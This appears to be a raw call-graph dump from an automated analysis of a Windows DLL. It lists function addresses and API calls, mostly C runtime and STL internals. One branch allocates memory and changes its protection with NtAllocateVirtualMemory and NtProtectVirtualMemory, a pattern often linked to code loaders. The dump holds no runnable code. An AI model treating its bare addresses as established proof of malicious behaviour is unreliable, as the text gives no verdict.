18000ee7e 15724->15726 15727 18011bf80 ctype 13 API calls 15724->15727 15725->15724 15728 1801059b0 std::_Lockit::~_Lockit LeaveCriticalSection 15726->15728 15727->15726 15728->15729 15729->15690 15731 180106664 std::_Facet_Register 5 API calls 15730->15731 15732 1801055fb 15731->15732 15732->15679 15734 18000993e Concurrency::cancel_current_task 15733->15734 15735 180108fa8 Concurrency::cancel_current_task 2 API calls 15734->15735 15736 18000994f 15735->15736 15737 180105938 std::_Lockit::_Lockit 6 API calls 15736->15737 15738 180009980 15737->15738 15739 180105938 std::_Lockit::_Lockit 6 API calls 15738->15739 15745 1800099cf Concurrency::cancel_current_task 15738->15745 15740 1800099a5 15739->15740 15743 1801059b0 std::_Lockit::~_Lockit LeaveCriticalSection 15740->15743 15741 1801059b0 std::_Lockit::~_Lockit LeaveCriticalSection 15742 180009a60 15741->15742 15744 180106610 Concurrency::cancel_current_task 8 API calls 15742->15744 15743->15745 15746 180009a70 15744->15746 15745->15741 15750 1801305f8 15747->15750 15771 18012fe24 15750->15771 15753 18012fe24 __crtLCMapStringW 5 API calls 15754 180130637 15753->15754 15755 18012fe24 __crtLCMapStringW 5 API calls 15754->15755 15756 180130656 15755->15756 15757 18012fe24 __crtLCMapStringW 5 API calls 15756->15757 15758 180130675 15757->15758 15759 18012fe24 __crtLCMapStringW 5 API calls 15758->15759 15760 180130694 15759->15760 15761 18012fe24 __crtLCMapStringW 5 API calls 15760->15761 15762 1801306b3 15761->15762 15763 18012fe24 __crtLCMapStringW 5 API calls 15762->15763 15764 1801306d2 15763->15764 15765 18012fe24 __crtLCMapStringW 5 API calls 15764->15765 15766 1801306f1 15765->15766 15767 18012fe24 __crtLCMapStringW 5 API calls 15766->15767 15768 180130710 15767->15768 15769 18012fe24 __crtLCMapStringW 5 API calls 15768->15769 15770 18013072f 15769->15770 15772 18012fe81 15771->15772 15773 18012fe7c __crtLCMapStringW 15771->15773 15772->15753 15773->15772 15774 18012feb1 LoadLibraryExW 15773->15774 15775 18012ffa6 GetProcAddress 15773->15775 15779 18012ff10 LoadLibraryExW 15773->15779 15776 18012ff86 15774->15776 15777 18012fed6 GetLastError 15774->15777 15775->15772 15776->15775 15778 18012ff9d FreeLibrary 15776->15778 15777->15773 15778->15775 15779->15773 15779->15776 15781 18012aab0 _Getctype 55 API calls 15780->15781 15782 18011d709 15781->15782 15827 18012c72c 15782->15827 15785 180105ec0 15844 180128918 15785->15844 15793 18000ed16 15793->15702 15796 18000f500 15794->15796 15795 18000f54b 15798 18000f563 15795->15798 15799 18000f5c8 15795->15799 15796->15795 15797 180105d24 13 API calls 15796->15797 15797->15796 15800 18000f59b 15798->15800 15802 180105d24 13 API calls 15798->15802 15801 180105240 Concurrency::cancel_current_task 2 API calls 15799->15801 15803 180106610 Concurrency::cancel_current_task 8 API calls 15800->15803 15805 18000f5cd 15801->15805 15802->15798 15804 18000f5af 15803->15804 15804->15709 15806 18000f614 ctype 15805->15806 15807 180105240 Concurrency::cancel_current_task 2 API calls 15805->15807 15806->15709 15808 18000f63f 15807->15808 15809 18000f668 15808->15809 15810 18011bf80 ctype 13 API calls 15808->15810 15811 18011bf80 ctype 13 API calls 15809->15811 15810->15809 15812 18000f671 messages 15811->15812 15812->15709 15814 18000edc3 15813->15814 15816 180105d4a 15813->15816 15814->15714 15815 180105e6a MultiByteToWideChar 15815->15814 15821 180105d86 15815->15821 15816->15814 15816->15815 15817 180105d79 15816->15817 15818 180105e0c 15816->15818 15817->15815 15817->15821 15818->15814 15820 180105e41 MultiByteToWideChar 15818->15820 15819 180124bfc _Wcrtomb 11 API calls 15819->15814 15820->15814 15820->15821 15821->15814 15821->15819 15864 1801051f8 15822->15864 15825 180108fa8 Concurrency::cancel_current_task 2 API calls 15826 18000eec9 15825->15826 15828 18012c741 15827->15828 15829 18000ed0d 15827->15829 15828->15829 15831 180137810 15828->15831 15829->15785 15832 18012aab0 _Getctype 55 API calls 15831->15832 15833 18013781f 15832->15833 15834 18013786a 15833->15834 15843 18012884c EnterCriticalSection 15833->15843 15834->15829 15845 18012aab0 _Getctype 55 API calls 15844->15845 15846 180128921 15845->15846 15847 18012c72c _Getctype 55 API calls 15846->15847 15848 180105ee5 15847->15848 15849 18012897c 15848->15849 15850 18012aab0 _Getctype 55 API calls 15849->15850 15851 180128985 15850->15851 15852 18012c72c _Getctype 55 API calls 15851->15852 15853 180105eec 15852->15853 15854 180128948 15853->15854 15855 18012aab0 _Getctype 55 API calls 15854->15855 15856 180128951 15855->15856 15857 18012c72c _Getctype 55 API calls 15856->15857 15858 180105ef4 15857->15858 15858->15793 15859 1801288e8 15858->15859 15860 18012aab0 _Getctype 55 API calls 15859->15860 15861 1801288f1 15860->15861 15862 18012c72c _Getctype 55 API calls 15861->15862 15863 18012890a 15862->15863 15863->15793 15865 180108748 __std_exception_copy 57 API calls 15864->15865 15866 18010522c 15865->15866 15866->15825 14647 180001010 14648 180106b20 14647->14648 14651 180106ae4 14648->14651 14650 180106b29 14652 180106afe 14651->14652 14654 180106af7 14651->14654 14655 18012a34c 14652->14655 14654->14650 14658 180129f88 14655->14658 14665 18012884c EnterCriticalSection 14658->14665 14660 180129fa4 14661 18012a000 57 API calls 14660->14661 14662 180129fad 14661->14662 14663 1801288a0 std::locale::_Setgloballocale LeaveCriticalSection 14662->14663 14664 180129fb6 14663->14664 14664->14654 16038 180002c10 16041 180024420 16038->16041 16042 1800244a5 16041->16042 16056 180024450 16041->16056 16043 180106750 3 API calls 16042->16043 16045 1800244b1 16043->16045 16048 180022fa0 shared_ptr InitializeCriticalSectionAndSpinCount 16045->16048 16045->16056 16046 18002445d 16049 180106664 std::_Facet_Register 5 API calls 16046->16049 16052 180024472 16046->16052 16051 1800244c2 16048->16051 16049->16052 16050 180002c19 16059 180106b20 16051->16059 16058 18001efd0 LeaveCriticalSection 16052->16058 16057 180004e50 EnterCriticalSection 16056->16057 16057->16046 16058->16050 16060 180106ae4 57 API calls 16059->16060 16061 1800244ce 16060->16061 16062 1801066e4 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 16061->16062 16078 180001020 16079 180106b20 16078->16079 16080 180106ae4 57 API calls 16079->16080 16081 180106b29 16080->16081 16329 180001030 16330 180005830 60 API calls 16329->16330 16331 18000104d 16330->16331 16332 180106ae4 57 API calls 16331->16332 16333 180106b29 16332->16333 18698 180001a30 18699 180106664 std::_Facet_Register 5 API calls 18698->18699 18700 180001a66 ctype 18699->18700 18701 180106ae4 57 API calls 18700->18701 18702 180106b29 18701->18702 19241 180002700 19246 180023e30 19241->19246 19243 180002717 19244 180106ae4 57 API calls 19243->19244 19245 180106b29 19244->19245 19247 180023e42 19246->19247 19252 180023eca 19246->19252 19250 180023eb7 messages 19247->19250 19251 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 19247->19251 19250->19243 19251->19252 19253 180022880 19252->19253 19254 1800228ac 19253->19254 19265 180005370 19254->19265 19256 1800228d7 19257 180005370 59 API calls 19256->19257 19258 1800228e2 19257->19258 19280 180022940 19258->19280 19266 180005383 19265->19266 19267 1800053a7 messages 19265->19267 19266->19267 19268 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 19266->19268 19267->19256 19269 1800053cd 19268->19269 19270 18000542d 19269->19270 19271 18000547d 19269->19271 19276 180005404 ctype 19269->19276 19272 180106664 std::_Facet_Register 5 API calls 19270->19272 19273 1800054c0 Concurrency::cancel_current_task 19270->19273 19274 180106664 std::_Facet_Register 5 API calls 19271->19274 19277 180005448 ctype 19271->19277 19275 180005443 19272->19275 19273->19276 19274->19277 19275->19277 19278 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 19275->19278 19276->19256 19277->19256 19279 1800054bf 19278->19279 19279->19273 19306 180013d30 19280->19306 19307 180013d51 19306->19307 19327 180009370 19307->19327 19328 180106664 std::_Facet_Register 5 API calls 19327->19328 19329 1800093cb 19328->19329 19330 180105628 69 API calls 19329->19330 19331 1800093db 19330->19331 19376 180001720 19377 180022fa0 shared_ptr InitializeCriticalSectionAndSpinCount 19376->19377 19378 180001730 19377->19378 19379 180106ae4 57 API calls 19378->19379 19380 180106b29 19379->19380 19484 180002750 19485 180023e30 72 API calls 19484->19485 19486 180002767 19485->19486 19487 180106ae4 57 API calls 19486->19487 19488 180106b29 19487->19488 14666 180001d60 14718 180008370 14666->14718 14669 180008370 59 API calls 14670 180001e1a 14669->14670 14671 180008370 59 API calls 14670->14671 14672 180001e8a ctype 14671->14672 14673 180008370 59 API calls 14672->14673 14674 180001f02 ctype 14673->14674 14675 180008370 59 API calls 14674->14675 14676 180001f79 14675->14676 14677 180008370 59 API calls 14676->14677 14678 180001fe5 14677->14678 14679 180008370 59 API calls 14678->14679 14680 18000204b 14679->14680 14681 180008370 59 API calls 14680->14681 14682 1800020b7 14681->14682 14683 180008370 59 API calls 14682->14683 14684 180002127 ctype 14683->14684 14685 180008370 59 API calls 14684->14685 14686 18000220f ctype 14685->14686 14729 180106664 14686->14729 14688 180002666 14751 18001f070 14688->14751 14689 180106664 std::_Facet_Register 5 API calls 14691 180002272 14689->14691 14691->14688 14691->14689 14699 180002368 messages 14691->14699 14743 180008d20 14691->14743 14692 18000266c 14694 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 14692->14694 14695 180002672 14694->14695 14697 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 14695->14697 14696 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 14696->14688 14698 180002678 14697->14698 14701 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 14698->14701 14699->14692 14699->14695 14699->14698 14700 18000267e 14699->14700 14703 180002684 14699->14703 14706 180002690 14699->14706 14707 18000268a 14699->14707 14709 18000262f messages 14699->14709 14710 180002696 14699->14710 14714 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 14699->14714 14717 180002660 14699->14717 14702 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 14700->14702 14701->14700 14702->14703 14704 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 14703->14704 14704->14707 14705 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 14705->14706 14708 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 14706->14708 14707->14705 14708->14710 14712 180106ae4 57 API calls 14709->14712 14738 1801160ac 14710->14738 14715 180106b29 14712->14715 14713 18000269c 14716 18001fe80 64 API calls 14713->14716 14714->14717 14716->14709 14717->14696 14719 180008389 14718->14719 14720 1800083ad 14718->14720 14721 180008392 14719->14721 14722 1800083d7 Concurrency::cancel_current_task 14719->14722 14723 180001dac 14720->14723 14726 180106664 std::_Facet_Register 5 API calls 14720->14726 14725 180106664 std::_Facet_Register 5 API calls 14721->14725 14724 180008397 14722->14724 14723->14669 14724->14723 14727 1801160ac _invalid_parameter_noinfo_noreturn 55 API calls 14724->14727 14725->14724 14726->14723 14728 1800083e2 14727->14728 14730 18010666f 14729->14730 14731 180106688 14730->14731 14732 1801293dc std::_Facet_Register 2 API calls 14730->14732 14733 18010668e 14730->14733 14731->14691 14732->14730 14734 18010669a Concurrency::cancel_current_task 14733->14734 14754 180105240 14733->14754 14736 1801066a0 14734->14736 14736->14736 14763 180115f24 14738->14763 14744 180008d46 14743->14744 14750 180008d5f ctype 14743->14750 14745 180008d92 14744->14745 14746 180008d55 14744->14746 14957 1800083f0 14745->14957 14748 180008370 59 API calls 14746->14748 14748->14750 14750->14691 14752 180105280 59 API calls 14751->14752 14753 18001f080 14752->14753 14753->14692 14755 18010524e std::bad_alloc::bad_alloc 14754->14755 14758 180108fa8 14755->14758 14757 18010525f 14759 180108fc7 14758->14759 14760 180109012 RaiseException 14759->14760 14761 180108ff0 RtlPcToFileHeader 14759->14761 14760->14757 14762 180109008 14761->14762 14762->14760 14764 180115f4f 14763->14764 14775 180115fc0 14764->14775 14766 180115f99 14769 180115fae 14766->14769 14770 180115ca0 _invalid_parameter_noinfo 55 API calls 14766->14770 14767 180115f76 14767->14766 14785 180115ca0 14767->14785 14771 1801160dc IsProcessorFeaturePresent 14769->14771 14770->14769 14772 1801160ef 14771->14772 14773 180115dc0 _invalid_parameter_noinfo_noreturn 14 API calls 14772->14773 14774 18011610a GetCurrentProcess TerminateProcess 14773->14774 14794 180115d08 14775->14794 14779 180115ffb 14779->14767 14781 1801160dc _invalid_parameter_noinfo_noreturn 17 API calls 14782 18011608b 14781->14782 14783 180115f24 _invalid_parameter_noinfo 55 API calls 14782->14783 14784 1801160a5 14783->14784 14784->14767 14786 180115cf3 14785->14786 14787 180115cb3 GetLastError 14785->14787 14786->14766 14788 180115cc3 14787->14788 14789 18012acf0 _invalid_parameter_noinfo 16 API calls 14788->14789 14790 180115cde SetLastError 14789->14790 14790->14786 14791 180115d01 14790->14791 14820 180125800 14791->14820 14795 180115d24 GetLastError 14794->14795 14796 180115d5f 14794->14796 14797 180115d34 14795->14797 14796->14779 14800 180115d74 14796->14800 14803 18012acf0 14797->14803 14801 180115da8 14800->14801 14802 180115d90 GetLastError SetLastError 14800->14802 14801->14779 14801->14781 14802->14801 14804 18012ad2a FlsSetValue 14803->14804 14805 18012ad0f FlsGetValue 14803->14805 14806 18012ad37 14804->14806 14809 180115d4f SetLastError 14804->14809 14807 18012ad24 14805->14807 14805->14809 14808 18012eb94 _Getctype 11 API calls 14806->14808 14807->14804 14810 18012ad46 14808->14810 14809->14796 14811 18012ad64 FlsSetValue 14810->14811 14812 18012ad54 FlsSetValue 14810->14812 14814 18012ad82 14811->14814 14815 18012ad70 FlsSetValue 14811->14815 14813 18012ad5d 14812->14813 14816 18012c690 __free_lconv_mon 11 API calls 14813->14816 14817 18012a81c _Getctype 11 API calls 14814->14817 14815->14813 14816->14809 14818 18012ad8a 14817->14818 14819 18012c690 __free_lconv_mon 11 API calls 14818->14819 14819->14809 14829 180126ab4 14820->14829 14878 180126960 14829->14878 14883 18012884c EnterCriticalSection 14878->14883 14963 180105280 14957->14963 14968 1801050f0 14963->14968 14966 180108fa8 Concurrency::cancel_current_task 2 API calls 14967 1801052a2 14966->14967 14971 180108748 14968->14971 14972 180105124 14971->14972 14974 180108769 14971->14974 14972->14966 14973 18010879e 14986 18011bf80 14973->14986 14974->14972 14974->14973 14977 18012a694 14974->14977 14978 18012a6a1 14977->14978 14979 18012a6ab 14977->14979 14978->14979 14984 18012a6c6 14978->14984 14980 180124bfc _Wcrtomb 11 API calls 14979->14980 14981 18012a6b2 14980->14981 14982 18011608c _invalid_parameter_noinfo 55 API calls 14981->14982 14983 18012a6be 14982->14983 14983->14973 14984->14983 14985 180124bfc _Wcrtomb 11 API calls 14984->14985 14985->14981 14987 18012c690 14986->14987 14988 18012c695 HeapFree 14987->14988 14989 18012c6c6 14987->14989 14988->14989 14990 18012c6b0 GetLastError 14988->14990 14989->14972 14991 18012c6bd __free_lconv_mon 14990->14991 14992 180124bfc _Wcrtomb 11 API calls 14991->14992 14992->14989 14993 180006560 14994 180025621 14993->14994 14995 1800256e4 14994->14995 14998 180025705 14994->14998 15006 180067599 14995->15006 14997 1800256f9 14999 180025734 NtAllocateVirtualMemory 14998->14999 15000 18002576a NtProtectVirtualMemory 14999->15000 15002 180025791 14999->15002 15000->15002 15003 180025818 15000->15003 15001 180067599 31 API calls 15004 18002580a 15001->15004 15002->15001 15005 180067599 31 API calls 15003->15005 15005->15004 15007 18006759b 15006->15007 15009 180067474 15006->15009 15010 180039f80 15007->15010 15009->14997 15011 180039f90 15010->15011 15019 18006f820 15011->15019 15013 180039f9f 15014 180039fbf 15013->15014 15043 180039d60 15013->15043 15014->15009 15016 180039fb2 15017 180039fcc 15016->15017 15069 180039fe0 15016->15069 15017->15009 15020 18006f830 15019->15020 15021 18006f851 15020->15021 15022 18006f87e 15020->15022 15083 180036db0 15021->15083 15087 18003c280 15022->15087 15025 18006f871 15025->15013 15026 18006f88a 15027 18006f8d5 15026->15027 15028 18006f893 15026->15028 15030 18006f8e4 15027->15030 15031 18006f92f 15027->15031 15029 180036db0 29 API calls 15028->15029 15034 18006f8b3 15029->15034 15091 180046de0 15030->15091 15105 18007d0c0 15031->15105 15034->15013 15035 18006f8ec 15042 18006f8f0 15035->15042 15118 18003d4e0 15035->15118 15037 180036db0 29 API calls 15038 18006f914 15037->15038 15040 180039fe0 30 API calls 15038->15040 15039 18006f9a3 15039->15013 15041 18006f91c 15040->15041 15041->15013 15042->15037 15042->15038 15042->15039 15044 180039d70 15043->15044 15045 180039f50 15044->15045 15050 180039d8b 15044->15050 15046 180036db0 29 API calls 15045->15046 15047 180039f72 15046->15047 15047->15016 15048 180039e8e 15057 180039efe 15048->15057 15445 18003cec0 15048->15445 15051 180039dcb 15050->15051 15342 180046ce0 15050->15342 15051->15048 15051->15057 15363 180059260 15051->15363 15054 180039dfa 15369 180059490 15054->15369 15057->15016 15058 180046de0 29 API calls 15058->15057 15059 180039e02 15059->15057 15387 180058da0 15059->15387 15061 180039e59 15061->15048 15061->15057 15063 180039e75 15061->15063 15436 180032650 15061->15436 15062 180039e20 15062->15057 15062->15061 15418 18005a2f0 15062->15418 15063->15057 15441 1800322c0 15063->15441 15067 180039e40 15067->15057 15431 180059ca0 15067->15431 15070 180039fe9 15069->15070 15071 18003a094 15069->15071 15070->15071 15072 180046ce0 29 API calls 15070->15072 15071->15014 15073 18003a029 15072->15073 15074 18003d0e0 29 API calls 15073->15074 15075 18003a057 15074->15075 15076 18003c240 DeleteCriticalSection 15075->15076 15077 18003a060 15076->15077 15078 180059260 14 API calls 15077->15078 15079 18003a069 15078->15079 15080 180032040 13 API calls 15079->15080 15081 18003a07b 15080->15081 15082 18003c550 13 API calls 15081->15082 15082->15071 15084 180036dd0 15083->15084 15131 180036780 15084->15131 15086 180036de2 15086->15025 15088 18003c28c 15087->15088 15089 18003c2aa InitializeCriticalSectionAndSpinCount 15088->15089 15090 18003c2bc 15088->15090 15089->15090 15090->15026 15092 180046dec 15091->15092 15093 180046df7 15092->15093 15094 180046e1d 15092->15094 15095 180036db0 29 API calls 15093->15095 15097 180046e65 15094->15097 15098 180046e3f 15094->15098 15096 180046e15 15095->15096 15096->15035 15100 18003c2e0 EnterCriticalSection 15097->15100 15099 180036db0 29 API calls 15098->15099 15101 180046e5d 15099->15101 15102 180046e76 15100->15102 15101->15035 15103 18003c3a0 LeaveCriticalSection 15102->15103 15104 180046eb8 15103->15104 15104->15035 15106 18007d0ca 15105->15106 15107 180083734 15106->15107 15326 180036ef0 15106->15326 15107->15035 15110 18003c2e0 EnterCriticalSection 15116 180083757 15110->15116 15111 18003c3a0 LeaveCriticalSection 15112 180083820 15111->15112 15330 180036ca0 15112->15330 15114 180083825 15114->15035 15115 18008378f 15115->15111 15116->15115 15117 180046ed0 29 API calls 15116->15117 15117->15115 15119 18003d4f2 15118->15119 15334 18003d880 15119->15334 15121 180106610 Concurrency::cancel_current_task 8 API calls 15122 18003d699 15121->15122 15122->15042 15123 18003d5a9 15124 18003c3a0 LeaveCriticalSection 15123->15124 15130 18003d5a7 15124->15130 15125 18003d514 15125->15123 15127 18003d581 15125->15127 15129 18003d5dc 15125->15129 15126 180036db0 29 API calls 15126->15129 15128 18003c3a0 LeaveCriticalSection 15127->15128 15128->15130 15129->15121 15130->15126 15130->15129 15150 180107230 15131->15150 15135 18003687d 15135->15086 15136 1800367a7 15136->15135 15163 18003c1d0 15136->15163 15138 1800367e1 15138->15135 15139 180036851 SetLastError 15138->15139 15166 18003c370 15138->15166 15139->15086 15141 180036803 15141->15135 15142 180036867 15141->15142 15169 1800251a0 15141->15169 15144 18003c370 TlsSetValue 15142->15144 15144->15135 15145 180036830 15145->15142 15146 18003c370 TlsSetValue 15145->15146 15147 180036843 15146->15147 15147->15142 15148 180036847 15147->15148 15149 180024a30 27 API calls 15148->15149 15149->15139 15151 180036790 GetLastError 15150->15151 15152 180024a30 15151->15152 15153 180024a45 15152->15153 15154 180024a57 15153->15154 15156 180024a8e 15153->15156 15155 180036db0 29 API calls 15154->15155 15162 180024a7c 15154->15162 15155->15162 15160 180024ca4 15156->15160 15156->15162 15178 18003c2e0 15156->15178 15158 180024c6c 15181 18003c3a0 15158->15181 15160->15162 15184 1800413f0 15160->15184 15162->15136 15164 180107230 15163->15164 15165 18003c1e0 GetLastError TlsGetValue SetLastError 15164->15165 15165->15138 15167 180107230 15166->15167 15168 18003c37a TlsSetValue 15167->15168 15168->15141 15170 1800251b0 15169->15170 15171 1800251bf 15170->15171 15173 1800251ea 15170->15173 15172 180036db0 29 API calls 15171->15172 15177 1800251dd 15172->15177 15174 18003c1d0 3 API calls 15173->15174 15173->15177 15175 18002525c 15174->15175 15176 18003c370 TlsSetValue 15175->15176 15175->15177 15176->15177 15177->15145 15179 180107230 15178->15179 15180 18003c2ea EnterCriticalSection 15179->15180 15180->15158 15182 180107230 15181->15182 15183 18003c3aa LeaveCriticalSection 15182->15183 15183->15160 15185 1800413fc 15184->15185 15199 18007cb80 15185->15199 15187 180041471 15187->15162 15188 180041404 15188->15187 15209 1800654c0 15188->15209 15214 180046bd0 15188->15214 15219 18004f180 15188->15219 15224 18007d000 15188->15224 15229 18007d1d0 15188->15229 15234 18007d0e0 15188->15234 15239 180071ee0 15188->15239 15244 18004a5d0 15188->15244 15249 18007d3f0 15188->15249 15254 18007cc20 15188->15254 15200 18007cb8a 15199->15200 15201 18007cbd7 15200->15201 15202 18007cbaf 15200->15202 15204 18003c2e0 EnterCriticalSection 15201->15204 15203 180036db0 29 API calls 15202->15203 15205 18007cbd0 15203->15205 15206 18007cbe8 15204->15206 15205->15188 15207 18003c3a0 LeaveCriticalSection 15206->15207 15208 18007cc0e 15207->15208 15208->15188 15211 1800654cc 15209->15211 15210 180065518 15210->15188 15211->15210 15266 180083510 15211->15266 15215 180046bdc 15214->15215 15216 180046c28 15215->15216 15217 180083510 29 API calls 15215->15217 15216->15188 15218 180046c22 15217->15218 15218->15188 15221 18004f18a 15219->15221 15220 18004f1c6 15220->15188 15221->15220 15222 180083510 29 API calls 15221->15222 15223 18004f1c1 15222->15223 15223->15188 15225 18007d00a 15224->15225 15226 18007d046 15225->15226 15227 180083510 29 API calls 15225->15227 15226->15188 15228 18007d041 15227->15228 15228->15188 15231 18007d1da 15229->15231 15230 18007d216 15230->15188 15231->15230 15232 180083510 29 API calls 15231->15232 15233 18007d211 15232->15233 15233->15188 15235 18007d0ea 15234->15235 15236 18007d126 15235->15236 15237 180083510 29 API calls 15235->15237 15236->15188 15238 18007d121 15237->15238 15238->15188 15240 180071eea 15239->15240 15241 180071f26 15240->15241 15242 180083510 29 API calls 15240->15242 15241->15188 15243 180071f21 15242->15243 15243->15188 15246 18004a5dc 15244->15246 15245 18004a628 15245->15188 15246->15245 15247 180083510 29 API calls 15246->15247 15248 18004a622 15247->15248 15248->15188 15251 18007d3fc 15249->15251 15250 18007d448 15250->15188 15251->15250 15252 180083510 29 API calls 15251->15252 15253 18007d442 15252->15253 15253->15188 15255 18007cc2c 15254->15255 15256 18007cc37 15255->15256 15257 18007cc5d 15255->15257 15258 180036db0 29 API calls 15256->15258 15259 18003c2e0 EnterCriticalSection 15257->15259 15260 18007cc55 15258->15260 15261 18007cc6e 15259->15261 15260->15188 15262 18003c3a0 LeaveCriticalSection 15261->15262 15263 18007cc94 15262->15263 15300 1800463f0 15263->15300 15265 18007cc9c 15265->15188 15267 180083529 15266->15267 15268 18003c2e0 EnterCriticalSection 15267->15268 15269 180083547 15268->15269 15274 180083573 15269->15274 15278 18008367a 15269->15278 15279 1800466e0 15269->15279 15271 18003c3a0 LeaveCriticalSection 15272 180065512 15271->15272 15272->15188 15275 1800836e6 15274->15275 15274->15278 15285 180064260 15274->15285 15289 180046ed0 15274->15289 15276 180036db0 29 API calls 15275->15276 15276->15278 15278->15271 15280 1800466ec 15279->15280 15281 180046940 29 API calls 15280->15281 15284 180046731 ctype 15280->15284 15282 180046715 15281->15282 15283 1800476a0 29 API calls 15282->15283 15282->15284 15283->15284 15284->15274 15286 180064282 15285->15286 15287 18003c480 13 API calls 15286->15287 15288 1800642db memcpy_s 15286->15288 15287->15288 15288->15274 15290 180046ee0 15289->15290 15291 180046f21 15290->15291 15295 18003c3a0 LeaveCriticalSection 15290->15295 15292 180046830 29 API calls 15291->15292 15298 180046f5a 15291->15298 15293 180046f36 15292->15293 15294 180046f67 15293->15294 15296 180036db0 29 API calls 15293->15296 15294->15274 15297 180046f0a 15295->15297 15296->15298 15299 18003c2e0 EnterCriticalSection 15297->15299 15298->15274 15299->15291 15302 1800463fc 15300->15302 15301 180046455 15301->15265 15302->15301 15306 18007cf10 15302->15306 15307 180046441 15306->15307 15308 18007cf19 15306->15308 15312 18003d0e0 15307->15312 15308->15307 15309 18003c2e0 EnterCriticalSection 15308->15309 15310 18007cf4f 15308->15310 15309->15310 15310->15307 15311 18003c3a0 LeaveCriticalSection 15310->15311 15311->15307 15313 18003d0f2 15312->15313 15314 18003d880 29 API calls 15313->15314 15320 18003d115 15314->15320 15315 18003d1c9 15316 180106610 Concurrency::cancel_current_task 8 API calls 15315->15316 15318 18003d284 15316->15318 15317 18003d1ae 15319 18003c3a0 LeaveCriticalSection 15317->15319 15318->15301 15325 18003d1aa 15319->15325 15320->15315 15320->15317 15321 18003d184 15320->15321 15323 18003c3a0 LeaveCriticalSection 15321->15323 15322 18003c2e0 EnterCriticalSection 15322->15325 15323->15325 15324 18003c3a0 LeaveCriticalSection 15324->15325 15325->15315 15325->15322 15325->15324 15327 180036efa 15326->15327 15328 180036780 29 API calls 15327->15328 15329 180036f02 15328->15329 15329->15110 15331 180036cac 15330->15331 15332 180036780 29 API calls 15331->15332 15333 180036cb4 15332->15333 15333->15114 15336 18003d88c 15334->15336 15335 18003d8b9 15337 180036db0 29 API calls 15335->15337 15336->15335 15339 18003d8c7 15336->15339 15338 18003d90b 15337->15338 15338->15125 15339->15338 15340 18003c2e0 EnterCriticalSection 15339->15340 15341 18003d8d8 15340->15341 15341->15125 15343 180046cf0 15342->15343 15344 180046cfb 15343->15344 15345 18003c2e0 EnterCriticalSection 15343->15345 15344->15051 15346 180046d15 15345->15346 15349 18003c3a0 LeaveCriticalSection 15346->15349 15361 180046d49 15346->15361 15348 180046d57 15350 180046d89 15348->15350 15351 180046d5b 15348->15351 15352 180046d35 15349->15352 15354 18003c3a0 LeaveCriticalSection 15350->15354 15353 180036db0 29 API calls 15351->15353 15358 18003c2e0 EnterCriticalSection 15352->15358 15355 180046d7b 15353->15355 15359 180046d87 15354->15359 15356 18003c3a0 LeaveCriticalSection 15355->15356 15356->15359 15357 180046dc6 15357->15051 15358->15361 15359->15357 15360 180036db0 29 API calls 15359->15360 15362 180046db9 15360->15362 15361->15355 15463 180046830 15361->15463 15362->15051 15364 1800592b9 15363->15364 15365 180059269 15363->15365 15364->15054 15366 1800592a2 15365->15366 15469 180099040 15365->15469 15473 18004c1e0 15366->15473 15370 18005949c 15369->15370 15371 1800594a7 15370->15371 15372 1800594ce 15370->15372 15373 180036db0 29 API calls 15371->15373 15374 1800594d5 15372->15374 15375 1800594fd 15372->15375 15376 1800594c6 15373->15376 15377 180036db0 29 API calls 15374->15377 15379 180059521 15375->15379 15380 18005954c 15375->15380 15376->15059 15378 1800594f5 15377->15378 15378->15059 15381 180036db0 29 API calls 15379->15381 15383 180032650 29 API calls 15380->15383 15386 18005956f 15380->15386 15382 18005953f 15381->15382 15382->15059 15384 180059562 15383->15384 15385 180032650 29 API calls 15384->15385 15384->15386 15385->15386 15386->15059 15388 180058db0 15387->15388 15389 180058dc3 15388->15389 15390 180058df0 15388->15390 15391 180036db0 29 API calls 15389->15391 15392 180058df5 15390->15392 15397 180058e22 15390->15397 15393 180058de3 15391->15393 15394 180036db0 29 API calls 15392->15394 15393->15062 15396 180058e15 15394->15396 15395 180058e27 15395->15062 15396->15062 15397->15395 15398 180058e84 15397->15398 15399 180058ebf 15397->15399 15401 180058e95 15398->15401 15493 18004c240 15398->15493 15400 18004c1e0 13 API calls 15399->15400 15404 180058eb4 15400->15404 15415 180058fee ctype 15401->15415 15498 18004c150 15401->15498 15405 180058ed8 15404->15405 15410 180058f0c 15404->15410 15404->15415 15406 180058ee9 15405->15406 15407 18005a2f0 29 API calls 15405->15407 15408 180059ca0 29 API calls 15406->15408 15406->15415 15407->15406 15409 180058f02 15408->15409 15412 1800322c0 29 API calls 15409->15412 15409->15415 15416 180058f7e 15409->15416 15410->15409 15411 18003c550 13 API calls 15410->15411 15411->15409 15413 180058f6c 15412->15413 15414 1800322c0 29 API calls 15413->15414 15413->15415 15414->15416 15415->15062 15416->15415 15417 180036db0 29 API calls 15416->15417 15417->15415 15419 18005a2fc 15418->15419 15420 18005a307 15419->15420 15421 18005a32d 15419->15421 15422 180036db0 29 API calls 15420->15422 15423 18005a337 15421->15423 15427 18005a35f 15421->15427 15424 18005a325 15422->15424 15425 180036db0 29 API calls 15423->15425 15424->15067 15426 18005a357 15425->15426 15426->15067 15428 180036db0 29 API calls 15427->15428 15430 18005a3ae 15427->15430 15429 18005a3a1 15428->15429 15429->15067 15430->15067 15432 180059caa 15431->15432 15433 180036db0 29 API calls 15432->15433 15434 180059ce6 15432->15434 15435 180059d19 15433->15435 15434->15061 15435->15061 15437 18003265a 15436->15437 15438 18003269c 15437->15438 15439 180036db0 29 API calls 15437->15439 15438->15063 15440 180032695 15439->15440 15440->15063 15442 1800322d5 15441->15442 15444 1800322f6 ctype 15442->15444 15506 180032f50 15442->15506 15444->15048 15446 18003ceda 15445->15446 15447 18003cfce 15446->15447 15448 18003d880 29 API calls 15446->15448 15449 180106610 Concurrency::cancel_current_task 8 API calls 15447->15449 15453 18003cf09 15448->15453 15450 180039ee4 15449->15450 15450->15057 15450->15058 15451 18003cf96 15452 18003c3a0 